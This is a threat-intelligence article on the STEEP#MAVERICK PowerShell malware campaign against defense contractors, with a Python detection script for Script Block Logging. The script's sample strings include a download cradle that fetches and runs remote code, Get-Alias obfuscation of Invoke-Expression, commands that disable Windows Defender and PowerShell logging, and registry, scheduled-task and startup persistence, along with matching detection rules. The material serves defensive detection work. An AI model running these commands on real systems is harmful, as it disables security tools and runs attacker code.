Introducing STEEP#MAVERICK Malware

A cyberattack campaign, potentially aimed at cyber espionage, is highlighting the increasingly sophisticated nature of cyber threats targeting defense contractors in the US and elsewhere.  The covert campaign, which researchers detected and are tracking as STEEP#MAVERICK, has hit multiple weapons contractors in Europe in recent months, including potentially a supplier to the US F-35 Lightning II fighter aircraft program.

What makes the campaign noteworthy, according to the researchers, is the overall attention the attacker has paid to operations security (OpSec) and to ensuring that its malware is hard to detect, difficult to remove, and challenging to analyze.   The PowerShell-based malware stager used in the attacks features an array of interesting tactics, persistence methods, counter-forensics, and layer upon layer of obfuscation to hide its code.[1]

The STEEP#MAVERICK campaign appears to have launched in late summer 2022, with attacks on two high-profile defense contractors in Europe.  Like many campaigns, the attack chain began with a spear-phishing email that contained a compressed (.zip) file holding a shortcut (.lnk) file posing as a PDF document that purportedly described company benefits.  The researchers described the phishing email as similar to one they had encountered in a campaign earlier this year involving North Korea's APT37 (aka Konni) threat group.

See:  https://redskyalliance.org/xindustry/konni-malware

When the .lnk file is executed, it triggers what the researchers describe as a "rather large and robust chain of stagers," each written in PowerShell and featuring as many as eight obfuscation layers.  The malware also has extensive anti-forensic and anti-debugging capabilities, including monitoring a long list of processes associated with tools that could be used to look for malicious behavior.  It is designed to disable logging and bypass Windows Defender.  It uses several techniques to persist on a system, including embedding itself in the system registry, registering itself as a scheduled task, and creating a startup shortcut.

The number and variety of anti-analysis and anti-monitoring checks in the malware are unusual.  So, too, are the large number of obfuscation layers applied to the payloads and the malware's attempts to substitute or generate new custom command-and-control (C2) stager payloads in response to analysis attempts.  Some obfuscation techniques, such as using PowerShell Get-Alias to resolve and run the Invoke-Expression cmdlet without naming it, are very rarely seen.  The malicious activities were performed in an OpSec-aware manner, with different types of anti-analysis checks and evasion attempts throughout the attack, at a relatively high operational tempo, and with custom payloads injected.
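The two paragraphs above describe behaviors that a defender can hunt for in PowerShell Script Block Logging (Event ID 4104) output: the Get-Alias indirection used in place of Invoke-Expression, Defender and logging tampering, an analysis-tool process check, and the three persistence mechanisms.  The following Python is an added example written for this article, not code from the researchers or from the STEEP#MAVERICK stagers.  The script blocks it triages are constructed stand-ins; the exact obfuscation forms (assembling the alias name from string fragments), the list of analysis-tool process names, and the task and value names are assumptions.  The point it makes is that a name-based rule for `iex`/`Invoke-Expression` misses the Get-Alias variants, while a rule keyed on the call operator being applied to a Get-Alias result catches them regardless of how the alias name is built.

```python
"""Triage of PowerShell script-block text for the behaviours described above.

Added example: the script blocks below are constructed stand-ins for what
Script Block Logging (Event ID 4104) records, not samples from the
STEEP#MAVERICK stagers; the obfuscation forms and tool names are assumptions.
"""
from __future__ import annotations
import re

SAMPLES: dict[str, str] = {
    # Download cradle that names the alias directly; a naive rule catches this.
    "plain_cradle": "iex ((New-Object Net.WebClient).DownloadString('http://203.0.113.10/s1'))",
    # Hypothetical Get-Alias indirection: the alias name is assembled at run time
    # and the result is invoked with the call operator, so neither 'iex' nor
    # 'Invoke-Expression' appears as a token anywhere in the block.
    "alias_concat": "& (gal ('i'+'ex')) $stage2",
    "alias_by_def": ".(Get-Alias -Definition ('Invoke-'+'Expression')) $stage2",
    # Assumed list of analysis tools a stager might look for before running.
    "tool_check": "if (Get-Process | ? { $_.Name -match 'procmon|wireshark|x64dbg' }) { exit }",
    "defender_off": "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath $env:TEMP",
    "logging_off": "Set-ItemProperty 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging' EnableScriptBlockLogging 0",
    "run_key": "New-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name Updater -Value $lnk",
    "sched_task": "schtasks /create /sc onlogon /tn Updater /tr $lnk",
    "startup_lnk": "Copy-Item $lnk ([Environment]::GetFolderPath('Startup'))",
    "benign": "Get-ChildItem -Recurse | Where-Object Length -gt 1MB | Sort-Object Length",
}

# PowerShell is case-insensitive, so every rule must be too.
FLAGS = re.IGNORECASE

# The rule many teams start with: match the cmdlet or its alias by name.
NAIVE_IEX = re.compile(r"\biex\b|\bInvoke-Expression\b", FLAGS)

RULES: dict[str, re.Pattern[str]] = {
    # Call operator (& or .) applied to whatever Get-Alias/gal returns. The script
    # never names the command it runs; legitimate code almost never does this.
    "alias-indirection": re.compile(r"[&.]\s*\(\s*(?:gal|get-alias)\b", FLAGS),
    "download-cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", FLAGS),
    "analysis-tool-check": re.compile(
        r"Get-Process\b.*?(?:procmon|procexp|wireshark|x64dbg|x32dbg|ollydbg|dnspy|fiddler)", FLAGS),
    "defender-tamper": re.compile(r"(?:Set|Add)-MpPreference\b.*?-(?:Disable\w+|Exclusion\w+)", FLAGS),
    "logging-tamper": re.compile(r"ScriptBlockLogging|ModuleLogging|wevtutil\s+cl\b", FLAGS),
    "persist-runkey": re.compile(r"CurrentVersion\\Run(?:Once)?\b", FLAGS),
    "persist-schtask": re.compile(r"schtasks(?:\.exe)?\s+/create\b|Register-ScheduledTask\b", FLAGS),
    "persist-startup": re.compile(r"GetFolderPath\(\s*['\"]Startup|Start Menu\\Programs\\Startup", FLAGS),
}


def classify(script_block: str) -> list[str]:
    """Names of the rules that fire on one script block, sorted."""
    return sorted(name for name, rx in RULES.items() if rx.search(script_block))


def naive_iex_match(script_block: str) -> bool:
    """Would a name-based iex/Invoke-Expression rule have flagged this block?"""
    return NAIVE_IEX.search(script_block) is not None


def triage(samples: dict[str, str]) -> dict[str, list[str]]:
    """Run every rule over every sample and return the tags per sample."""
    return {name: classify(text) for name, text in samples.items()}


def missed_by_naive_rule(samples: dict[str, str]) -> list[str]:
    """Blocks that run code through Get-Alias without ever naming iex or Invoke-Expression."""
    return sorted(
        name for name, text in samples.items()
        if "alias-indirection" in classify(text) and not naive_iex_match(text)
    )


if __name__ == "__main__":
    for name, tags in triage(SAMPLES).items():
        flag = "naive-hit " if naive_iex_match(SAMPLES[name]) else "naive-miss"
        print(f"{name:13} {flag} {', '.join(tags) or '-'}")
    print("evaded the name-based rule:", missed_by_naive_rule(SAMPLES))
```

In practice the same rules would be run over the `ScriptBlockText` field of real 4104 events; the value of the `alias-indirection` rule is that it keys on the structure of the call rather than on any string the attacker controls, which is what the string-concatenation variants defeat.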

Based on the details of the attack, one takeaway for other organizations is to pay extra attention to monitoring their own security tools.  Organizations should verify that those tools are working as expected, since this malware actively disables logging and Defender, and should avoid relying on a single security tool or technology to detect threats.

The STEEP#MAVERICK campaign is only the latest in a growing number of campaigns that have targeted defense contractors and suppliers in recent years.  Many of these campaigns have involved state-backed actors operating out of China, Russia, North Korea, and other countries.

In January 2022, the US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert warning of Russian state-sponsored actors targeting so-called cleared defense contractors (CDCs) in attacks designed to steal sensitive US defense information and technology.  The CISA alert described the attacks as targeting a wide swath of CDCs, including those involved in developing combat systems, intelligence and surveillance technologies, weapons and missile development, and combat vehicle and aircraft design.

In February 2022, researchers at Palo Alto Networks reported on at least four US defense contractors being targeted in a campaign to distribute a fileless, socketless backdoor called SockDetour.  The attacks were part of a broader campaign that the security vendor had investigated along with the National Security Agency in 2021, involving a Chinese advanced persistent threat (APT) group that targeted defense contractors and organizations in multiple other sectors.

Adding to the concerns over the rising volume of cyberattacks is the relative vulnerability of many defense contractors, despite their holding secrets that should be closely guarded.  Recent research that Black Kite conducted into the security practices of the top 100 US defense contractors showed that nearly a third (32%) are vulnerable to ransomware attacks.  This is because of factors such as leaked or compromised credentials and weak practices in areas such as credential management, application security, and Secure Sockets Layer/Transport Layer Security (SSL/TLS) configuration.  Seventy-two percent of the contractors assessed in the Black Kite report have experienced at least one incident involving a leaked credential.

The US Department of Defense, in conjunction with industry stakeholders, has developed a set of cybersecurity best practices for military contractors to use to protect sensitive data.  Under the DoD's Cybersecurity Maturity Model Certification (CMMC) program, defense contractors are required to implement these practices and be certified as having done so before they can sell to the government.  The bad news?  The rollout of the program has been delayed.

If you need help with NIST 800-171 or CMMC compliance, please visit: https://www.wapacklabs.com/compliance

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  For questions, comments or assistance, please contact the office directly at 1-844-492-7225 or feedback@wapacklabs.com

Weekly Cyber Intelligence Briefings:

  • Reporting: https://www.redskyalliance.org/
  • Website: https://www.wapacklabs.com/
  • LinkedIn: https://www.linkedin.com/company/64265941

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/5504229295967742989  

[1] https://www.darkreading.com/attacks-breaches/sophisticated-cyberattack-campaign-targets-defense-contractors